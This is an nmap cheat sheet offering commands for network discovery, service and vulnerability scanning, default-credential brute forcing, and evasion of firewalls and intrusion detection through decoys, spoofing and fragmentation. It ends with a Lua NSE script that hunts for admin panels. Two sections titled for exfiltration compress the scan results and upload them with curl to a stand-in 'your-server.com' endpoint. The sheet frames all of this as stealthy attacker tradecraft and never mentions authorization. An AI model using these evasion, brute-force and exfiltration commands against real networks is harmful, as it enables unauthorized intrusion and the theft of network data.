    1. THE FUNDAMENTALS
  # Quick port scan with version detection
nmap -sV -T4 192.168.1.1

# Full port scan (slow but thorough)
nmap -p- -sV -T4 192.168.1.1

# Aggressive scan (OS, version, scripts, traceroute)
nmap -A -T4 192.168.1.1

# Save everything (normal, XML, grepable)
nmap -oA scan_name -A -T4 192.168.1.0/24 
   

    2. NETWORK DISCOVERY 
      # Ping sweep - find live hosts
nmap -sn 192.168.1.0/24

# ARP ping (works even when ICMP is blocked, needs root)
nmap -sn -PR 192.168.1.0/24

# TCP SYN ping (bypasses firewall rules)
nmap -sn -PS 443,80 192.168.1.0/24

# Fast host discovery with traceroute
nmap -sn --traceroute 192.168.1.0/24


    3. STEALTH AND EVASION
        
# Sneaky scan (slow, hard to detect)
nmap -T1 -sS 192.168.1.1

# Decoy scan (hide your IP among 10 random hosts)
nmap -D RND:10 -sS 192.168.1.1

# Fragment packets (evade simple firewalls)
nmap -f -sS 192.168.1.1

# MAC spoofing (needs root)
nmap --spoof-mac 0 192.168.1.1

# Source port manipulation (pretend to be DNS)
nmap --source-port 53 -sS 192.168.1.1

# Idle scan (use a zombie host, advanced)
nmap -sI zombie_ip 192.168.1.1


    4. ADVANCED SCANNING TECHNIQUE
        # TCP Null scan (evade non-stateful firewalls)
nmap -sN 192.168.1.1

# TCP FIN scan
nmap -sF 192.168.1.1

# TCP Maimon scan
nmap -sM 192.168.1.1

# ACK scan (map firewall rules)
nmap -sA 192.168.1.1

# Window scan (same as ACK but better)
nmap -sW 192.168.1.1

# Custom packet scan 
nmap --scanflags SYN,URG 192.168.1.1


    5. SERVICE AND VULNERABILITY DISCOVERY 
       # Version detection with intensity (0-9, higher is slower but deeper)
nmap -sV --version-intensity 9 192.168.1.1

# Service scan with default scripts
nmap -sC -T4 192.168.1.1

# Vulnerability scan (noisy, but effective)
nmap --script vuln -T4 192.168.1.1

# Specific vulnerability scripts
nmap --script http-vuln-*,smb-vuln-* -T4 192.168.1.1

# Brute force default credentials (dangerous) 
nmap --script brute 192.168.1.1

# SMTP open relay check
nmap --script smtp-open-relay -p 25 192.168.1.1

# DNS enumeration
nmap --script dns-recursion,dns-zone-transfer -p 53 192.168.1.0/24


    6. OUTPUT AND EXFILTRATION 
         # Save all formats
nmap -oA scan_name 192.168.1.0/24

# Grepable output for scripting
nmap -oG scan.grep 192.168.1.0/24

# Extract IPs from scan
grep "Nmap scan report" scan.txt | awk '{print $5}' > live_hosts.txt

# Extract open ports
grep "open" scan.txt | awk '{print $1, $3}' > open_ports.txt

# For exfiltration: compress and send to your server
tar -czf scan_results.tar.gz scan.txt scan.xml scan.grep
curl -F "file=@scan_results.tar.gz" http://your-server.com/upload


    7. TIMING AND PERFORMANCE 
         # Paranoid (0.1s delay, avoid IDS)
nmap -T0 -sS 192.168.1.1

# Sneaky (15s delay, still evasive)
nmap -T1 -sS 192.168.1.1

# Polite (0.4s delay, normal)
nmap -T2 -sS 192.168.1.1

# Normal (default)
nmap -T3 -sS 192.168.1.1

# Aggressive (fast, might drop packets)
nmap -T4 -sS 192.168.1.1

# Insane (very fast, likely to trigger alerts)
nmap -T5 -sS 192.168.1.1

# Max rate (overkill, for when you don't care about stealth)
nmap --min-rate 10000 -p- 192.168.1.1


    8. EXFILTRATION AND POST-PROCESSING 
       # Step 1: Host discovery (fast)
nmap -sn 192.168.1.0/24 -oG live_hosts.grep

# Step 2: Extract IPs to file
grep "Up" live_hosts.grep | cut -d' ' -f2 > ip_list.txt

# Step 3: Deep scan each host
while read ip; do
    nmap -sV -A -T4 $ip -oN scan_$ip.txt
done < ip_list.txt

# Step 4: Extract interesting data
grep -E "open|VERSION|OS" scan_*.txt > interesting_results.txt

# Step 5: Exfiltrate to your server 
tar -czf batch_scan.tar.gz scan_*.txt interesting_results.txt
curl -X POST -F "data=@batch_scan.tar.gz" http://your-server.com/exfil


    9. TARGET-SPECIFIC COMMANDS 
         # Web server enumeration
nmap --script http-enum,http-headers,http-title -p 80,443,8080 192.168.1.1

# SMB enumeration (Windows networks)
nmap --script smb-os-discovery,smb-security-mode -p 445 192.168.1.0/24

# SSH enumeration
nmap --script ssh-auth-methods,ssh-hostkey -p 22 192.168.1.1

# FTP enumeration
nmap --script ftp-anon,ftp-bounce -p 21 192.168.1.1

# Database enumeration (MySQL, PostgreSQL, MongoDB)
nmap --script mysql-info,postgres-brute,mongodb-databases -p 3306,5432,27017 192.168.1.1

# SNMP enumeration (often forgotten)
nmap --script snmp-community,snmp-info -p 161 192.168.1.0/24


10. AGGRESSIVE COMMANDS 
      # Full aggressive on entire subnet
nmap -A -T4 -p- 192.168.1.0/24 -oA full_subnet_scan

# Vulnerability scan with maximum intensity
nmap --script vuln --script-args vulns.timeout=30s -T4 192.168.1.1

# Brute force default credentials on multiple services
nmap --script brute -p 21,22,23,80,443,445,3306,3389 192.168.1.1

# Fast port discovery + deep scan (two-pass)
nmap -p- --min-rate 10000 -T4 192.168.1.1 -oN fast_ports.txt
nmap -sV -A -p $(grep -E "^[0-9]" fast_ports.txt | cut -d'/' -f1 | tr '\n' ',') 192.168.1.1


11. IP V6 SCANNING 
       # IPv6 ping sweep (find live hosts)
nmap -6 -sn 2001:db8::/32

# IPv6 version scan
nmap -6 -sV -T4 2001:db8::1

# IPv6 full port scan (slow but thorough)
nmap -6 -p- -sV -T4 2001:db8::1

# IPv6 aggressive scan
nmap -6 -A -T4 2001:db8::1

# IPv6 traceroute
nmap -6 --traceroute 2001:db8::1

# IPv6 script scan
nmap -6 --script smb-os-discovery -p 445 2001:db8::1

# IPv6 firewall evasion (some firewalls don't inspect IPv6 properly)
nmap -6 -f -sS 2001:db8::1


12. FIREWALL EVASION 
      # Randomize host order (evade pattern-based detection)
nmap --randomize-hosts 192.168.1.0/24

# Append random data to packets (evade signature detection)
nmap --data-length 200 192.168.1.1

# Specify minimum TTL (evade TTL-based filters that drop packets with odd TTLs)
nmap --ttl 128 192.168.1.1

# Send bad checksums (some IDS systems ignore bad checksums, older systems process them)
nmap --badsum 192.168.1.1

# Use specific source IP (spoofing, requires root and network access)
nmap -S 10.10.10.10 -e eth0 192.168.1.1

# IP fragmentation with specific offset (evades older firewalls)
nmap -f --mtu 8 192.168.1.1

# SCTP scan (less common, often not monitored)
nmap -sY -T4 192.168.1.1

# Custom packet timing (evade rate-based detectors)
nmap --scan-delay 1s --max-retries 0 192.168.1.1
 

13. NSE SCRIPT DEVELOPMENT 
       # List all scripts by category
ls /usr/share/nmap/scripts/*.nse

# Search for scripts by keyword
grep -r "smb" /usr/share/nmap/scripts/

# Run a script with custom arguments
nmap --script smb-os-discovery --script-args smb-os-discovery.verbose=true 192.168.1.1

# Run a custom script 
nmap --script ./my_custom_script.nse 192.168.1.1

# Debug script execution
nmap --script-trace --script http-enum 192.168.1.1
  
---CUSTOM TEMPLATE 
  
  -- Place this in ~/.nmap/scripts/my_http_check.nse
local http = require "http"
local nmap = require "nmap"
local stdnse = require "stdnse"

portrule = function(host, port)
    return port.number == 80 and port.state == "open"
end

action = function(host, port)
    local path = "/admin"
    local response = http.get(host, port, path)
    if response.status == 200 then
        return string.format("Admin panel found at %s%s", host.ip, path)
    end
    return nil
end



